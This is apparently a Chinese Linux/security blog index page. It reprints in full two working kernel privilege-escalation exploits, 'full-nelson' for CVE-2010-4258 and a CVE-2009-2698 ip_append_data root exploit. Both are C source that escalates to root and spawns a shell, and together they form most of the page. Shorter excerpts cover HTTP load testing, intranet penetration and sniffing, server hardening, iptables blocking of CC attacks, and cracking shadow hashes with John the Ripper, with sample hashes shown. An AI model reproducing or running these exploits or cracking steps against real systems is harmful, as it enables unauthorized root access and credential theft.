Chinadu's Blog

/*

* Linux Kernel <= 2.6.37 local privilege escalation

* by Dan Rosenberg

* @djrbliss on twitter

*

* Usage:

* gcc full-nelson.c -o full-nelson

* ./full-nelson

*

* This exploit leverages three vulnerabilities to get root, all of which were

* discovered by Nelson Elhage:

*

* CVE-2010-4258

* -------------

* This is the interesting one, and the reason I wrote this exploit. If a

* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL

* word will be written to a user-specified pointer when that thread exits.

* This write is done using put_user(), which ensures the provided destination

* resides in valid userspace by invoking access_ok(). However, Nelson

* discovered that when the kernel performs an address limit override via

* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,

* etc.), this override is not reverted before calling put_user() in the exit

* path, allowing a user to write a NULL word to an arbitrary kernel address.

* Note that this issue requires an additional vulnerability to trigger.

*

* CVE-2010-3849

* -------------

* This is a NULL pointer dereference in the Econet protocol. By itself, it's

* fairly benign as a local denial-of-service. It's a perfect candidate to

* trigger the above issue, since it's reachable via sock_no_sendpage(), which

* subsequently calls sendmsg under KERNEL_DS.

*

* CVE-2010-3850

* -------------

* I wouldn't be able to reach the NULL pointer dereference and trigger the

* OOPS if users weren't able to assign Econet addresses to arbitrary

* interfaces due to a missing capabilities check.

*

* In the interest of public safety, this exploit was specifically designed to

* be limited:

*

* * The particular symbols I resolve are not exported on Slackware or Debian

* * Red Hat does not support Econet by default

* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and

* Debian

*

* However, the important issue, CVE-2010-4258, affects everyone, and it would

* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly

* more sophisticated version of this that doesn't have the roadblocks I put in

* to prevent abuse by script kiddies.

*

* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.

*

* NOTE: the exploit process will deadlock and stay in a zombie state after you

* exit your root shell because the Econet thread OOPSes while holding the

* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.

*

* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla

*/

#include <stdio.h>

#include <sys/socket.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <string.h>

#include <net/if.h>

#include <sched.h>

#include <stdlib.h>

#include <signal.h>

#include <sys/utsname.h>

#include <sys/mman.h>

#include <unistd.h>

/* How many bytes should we clear in our

* function pointer to put it into userspace? */

#ifdef __x86_64__

#define SHIFT 24

#define OFFSET 3

#else

#define SHIFT 8

#define OFFSET 1

#endif

/* thanks spender... */

unsigned long get_kernel_sym(char *name)

{

FILE *f;

unsigned long addr;

char dummy;

char sname[512];

struct utsname ver;

int ret;

int rep = 0;

int oldstyle = 0;

f = fopen("/proc/kallsyms", "r");

if (f == NULL) {

f = fopen("/proc/ksyms", "r");

if (f == NULL)

goto fallback;

oldstyle = 1;

}

repeat:

ret = 0;

while(ret != EOF) {

if (!oldstyle)

ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);

else {

ret = fscanf(f, "%p %s\n", (void **)&addr, sname);

if (ret == 2) {

char *p;

if (strstr(sname, "_O/") || strstr(sname, "_S."))

continue;

p = strrchr(sname, '_');

if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {

p = p - 4;

while (p > (char *)sname && *(p - 1) == '_')

p--;

*p = '\0';

}

}

}

if (ret == 0) {

fscanf(f, "%s\n", sname);

continue;

}

if (!strcmp(name, sname)) {

fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");

fclose(f);

return addr;

}

}

fclose(f);

if (rep)

return 0;

fallback:

uname(&ver);

if (strncmp(ver.release, "2.6", 3))

oldstyle = 1;

sprintf(sname, "/boot/System.map-%s", ver.release);

f = fopen(sname, "r");

if (f == NULL)

return 0;

rep = 1;

goto repeat;

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))

getroot(void * file, void * vma)

{

commit_creds(prepare_kernel_cred(0));

return -1;

}

/* Why do I do this? Because on x86-64, the address of

* commit_creds and prepare_kernel_cred are loaded relative

* to rip, which means I can't just copy the above payload

* into my landing area. */

void __attribute__((regparm(3)))

trampoline()

{

#ifdef __x86_64__

asm("mov $getroot, %rax; call *%rax;");

#else

asm("mov $getroot, %eax; call *%eax;");

#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg

* via sock_no_sendpage, so it's under KERNEL_DS */

int trigger(int * fildes)

{

int ret;

struct ifreq ifr;

memset(&ifr, 0, sizeof(ifr));

strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

if(ret < 0) {

printf("[*] Failed to set Econet address.\n");

return -1;

}

splice(fildes[3], NULL, fildes[1], NULL, 128, 0);

splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

/* Shouldn't get here... */

exit(0);

}

int main(int argc, char * argv[])

{

unsigned long econet_ops, econet_ioctl, target, landing;

int fildes[4], pid;

void * newstack, * payload;

/* Create file descriptors now so there are two

references to them after cloning...otherwise

the child will never return because it

deadlocks when trying to unlock various

mutexes after OOPSing */

pipe(fildes);

fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);

fildes[3] = open("/dev/zero", O_RDONLY);

if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {

printf("[*] Failed to open file descriptors.\n");

return -1;

}

/* Resolve addresses of relevant symbols */

printf("[*] Resolving kernel addresses...\n");

econet_ioctl = get_kernel_sym("econet_ioctl");

econet_ops = get_kernel_sym("econet_ops");

commit_creds = (_commit_creds) get_kernel_sym("commit_creds");

prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {

printf("[*] Failed to resolve kernel symbols.\n");

return -1;

}

if(!(newstack = malloc(65536))) {

printf("[*] Failed to allocate memory.\n");

return -1;

}

printf("[*] Calculating target...\n");

target = econet_ops + 10 * sizeof(void *) - OFFSET;

/* Clear the higher bits */

landing = econet_ioctl << SHIFT >> SHIFT;

payload = mmap((void *)(landing & ~0xfff), 2 * 4096,

PROT_READ | PROT_WRITE | PROT_EXEC,

MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

if ((long)payload == -1) {

printf("[*] Failed to mmap() at target address.\n");

return -1;

}

memcpy((void *)landing, &trampoline, 1024);

clone((int (*)(void *))trigger,

(void *)((unsigned long)newstack + 65536),

CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,

&fildes, NULL, NULL, target);

sleep(1);

printf("[*] Triggering payload...\n");

ioctl(fildes[2], 0, NULL);

if(getuid()) {

printf("[*] Exploit failed to get root.\n");

return -1;

}

printf("[*] Got root!\n");

execl("/bin/sh", "/bin/sh", NULL);

}

一、http_load

http_load以并行复用的方式运行，用以测试web服务器的吞吐量与负载。但是它不同于大多数压力测试工具，它可以以一个单

一的进程运行，一般不会把客户机搞死。还可以测试HTTPS类的网站请求。
#wget http://www.acme.com/software/http_load/http_load-12mar2006.tar.gz
#tar zxvf http_load-12mar2006.tar.gz
#cd http_load-12mar2006
#make && make install
#http_load -p并发访问进程数 -f总计的访问次数 -r每秒的访问频率 -s访问时间  需要访问的url文件
#echo "http://192.168.1.101/test.php" >1.txt
#http_load -p 30 -s 60 1.txt
7751 fetches, 30 max parallel, 2.9119e+08 bytes, in 60.0024 seconds
37568 mean bytes/connection
129.178 fetches/sec, 4.85297e+06 bytes/sec
msecs/connect: 77.8017 mean, 3050.89 max, 30.308 min
msecs/first-response: 50.3716 mean, 9148.3 max, 31.205 min
HTTP response codes:code 200 -- 7751                说明打开响应页面的类型

http://www.acme.com/software这个网站上有很多小工具:http_ping、http_get、http_post

还有一个secure HTTP server:thttpd

二、webbench
阅读全文...

内网渗透在攻击层面，其实更趋向于社工和常规漏洞检测的结合，为了了解网内防护措施的设置是通过一步步的刺探和经验积累，有时判断出错，也能进入误 区。但是如果能在网内进行嗅探，则能事半功倍，处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破，到控制整个内网的全过程来跟大家讨论，内 网的渗透嗅探术和安全防护一些内容。

在寻找突破时，更多的是从应用服务来，而应用服务最直观的信息采集，就是端口扫描，不同的应用，开放的服务不一样。所以，在对网络进行信息收集时， 大概分为这样两步： 端口探测，程序指纹分析。在端口探测方面，个人喜欢用SuperScan来快速对网段里的应用进行判断，如图：

在掌握端口信息后，就要对服务应用程序的指纹进行分析，主要包括版本号、已知的漏洞信息、常规配置信息、针对此应用流行的攻击方法等。本文试着对网内一台提供WEB服务的主机作为突破口，提交一个畸形的请求，如图：

阅读全文...

关于分区

一个潜在的黑客如果要攻击你的Linux服务器，他首先就会尝试缓冲区溢出。在过去的几年中，以缓冲区溢出为类型的安全漏洞是最为常见的一种形式了。更为严重的是，缓冲区溢出漏洞占了远程网络攻击的绝大多数，这种攻击可以轻易使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权！

为了防止此类攻击，我们从安装系统时就应该注意。如果用root分区纪录数据，如log文件和email，就可能因为拒绝服务产生大量日志或垃 圾邮件，从而导致系统崩溃。所以建议为/var开辟单独的分区，用来存放日志和邮件，以避免root分区被溢出。最好为特殊的应用程序单独开一个分区，特 别是可以产生大量日志的程序，还有建议为/home单独分一个区，这样他们就不能填满/分区了，从而就避免了部分针对Linux分区溢出的恶意攻击。

关于BIOS

记着要在BIOS设置中设定一个BIOS密码，不接收软盘启动。这样可以阻止不怀好意的人用专门的启动盘启动你的Linux系统，并避免别人更改BIOS设置，如更改软盘启动设置或不弹出密码框直接启动服务器等等。

关于口令

口令是系统中认证用户的主要手段，系统安装时默认的口令最小长度通常为5，但为保证口令不易被猜测攻击，可增加口令的最小长度，至少等于8。为 此，需修改文件/etc/login.defs中参数PASS_MIN_LEN（口令最小长度）。同时应限制口令使用时间，保证定期更换口令，建议修改参 数PASS_MIN_DAYS（口令使用时间）。
阅读全文...

当apache站点受到严重的cc攻击，我们可以用iptables来防止web服务器被CC攻击，实现自动屏蔽IP的功能。

1．系统要求

(1)LINUX 内核版本：2.6.9-42ELsmp或2.6.9-55ELsmp（其它内核版本需要重新编译内核，比较麻烦，但是也是可以实现的）。

(2)iptables版本：1.3.7

2. 安装

安装iptables1.3.7和系统内核版本对应的内核模块kernel-smp-modules-connlimit

3. 配置相应的iptables规则

示例如下：
阅读全文...

来源：iCNPunk

安装GCC编译环境：

[root@localhost run]# yum install gcc

到http://www.openwall.com/john/下载适合自己的编译包，我选择的是稳定版：

[root@localhost run]# wget http://www.openwall.com/john/f/john-1.7.0.2.tar.gz
阅读全文...

来源：iCNPunk

测试环境，RHEL5系统，系统root帐户一个，自建帐户icnpunk一个。

[root@localhost run]# ./unshadow /etc/passwd /etc/shadow > /tmp/passwd

[root@localhost run]# vim /tmp/passwd
删除没有用的行，只剩下需要破解的账号：

root:$1$aUXH7Z3Y$fec8RLXoAkEdn41UmvMYj.:0:0:root:/root:/bin/bash
icnpunk:$1$CmzD3ab0$qp.JmpXa8d3IIBYrltWDb/:500:500::/home/icnpunk:/bin/bash

阅读全文...

漏洞利用程序：

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by
.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
	unsigned *addr=task;
	while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
		addr++;
	}
	addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
	addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
	return;
}
void exploit();
void kernel_code()
{
	asm("exploit:\n"
		"push %eax\n"
		"movl $0xfffff000,%eax\n"
		"andl %esp,%eax\n"
		"pushl (%eax)\n"
		"call get_root_uid\n"
		"addl $4,%esp\n"
		"popl %eax\n");
	return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
	int fd=0;
	char buf[1024];
	struct sockaddr x0x;
	void *zero_page;

	uid=getuid();
	gid=getgid();
	if(uid==0){
		fprintf(stderr,"[-] check ur uid\n");
		return -1;
	}
	if(personality(0xffffffff)==PER_SVR4){
		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
			perror("[-] mprotect()");
			return -1;
		}
	}
	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
			perror("[-] mmap()");
			return -1;
	}
	*(unsigned long *)0x0=0x90909090;
	*(char *)0x00000004=0x90; /* +1 */
	*(char *)0x00000005=0xff;
	*(char *)0x00000006=0x25;
	*(unsigned long *)0x00000007=(unsigned long)&kernel;
	*(char *)0x0000000b=0xc3;

	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
		perror("[-] socket()");
		return -1;
	}
	x0x.sa_family=AF_UNSPEC;
	memset(x0x.sa_data,0x82,14);
	memset((char *)buf,0,sizeof(buf));
	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
	if(getuid()==uid){
		printf("[-] exploit failed, try again\n");
		return -1;
	}
	close(fd);
	execl("/bin/sh","sh","-i",NULL);
	return 0;
}

/* eoc */

新闻来源:LinuxToy
在跳票一个星期后，Magic Linux开发团队放出了 Magic Linux 2.5 的第二个 Beta 版本以供用户测试。Magic Linux 2.5 Beta 2 包含 Kernel 2.6.30.5、Glibc 2.10.1、GCC 4.4.0、X.Org 1.6.3、KDE 4.3.0 等主要组件。根据 Magic Linux 2.5 Beta 2 发布公告显 示，该版本除了对系统软件和仓库进行更新之外，还修正了安装程序在有读卡器的机器上无法启动、Java 中文字体配置、Fcitx 不能启动、仓库配置、Phonon 声卡独占、Konsole 字体显示、Strigi 和 Nepomukserver 在关闭桌面搜索时仍然启动、K 帮助中心左侧树形索引中文乱码等多个问题。
阅读全文...

新闻来源:LinuxToy
Slackware Linux 这个老牌的 Linux 发行版在今天推出了 13.0 正式版本。新版本不仅对重要组件进行了升级，而且增加了新的 .txz 包格式。
自 Slackware Linux 12.2 以来，该版本主要包含以下更新:

• 完全重制了 X 包集
• 对桌面环境进行了升级，含 KDE 4.2.4 和 Xfce 4.6.1
• 新的具有更好压缩功能的 .txz 包格式
• 对开发系统、网络服务、库、以及应用程序进行了升级

阅读全文...

在微软本月月经日(8.11)的同一天，国外黑客taviso和julien公开了可以攻击所有新旧Linux系统的一个漏洞，包括但不限于 RedHat,CentOS,Suse,Debian,Ubuntu,Slackware,Mandriva,Gentoo及其衍生系统。黑客只需要执行一个命令，就可以通过此漏洞获得root权限，即使开启了SELinux也于事无补。攻击这个漏洞到底有多简单，下面我们看图说话，有图有真相。
阅读全文...

雨林木风以前是制作Windows系统安装光盘的组织，在MS反盗版的作用下，雨林木风已经转战Linux阵营，并在近期推出了基于Fedora 11的、中文友好的Linux发行版：Ylmf Linux！
阅读全文...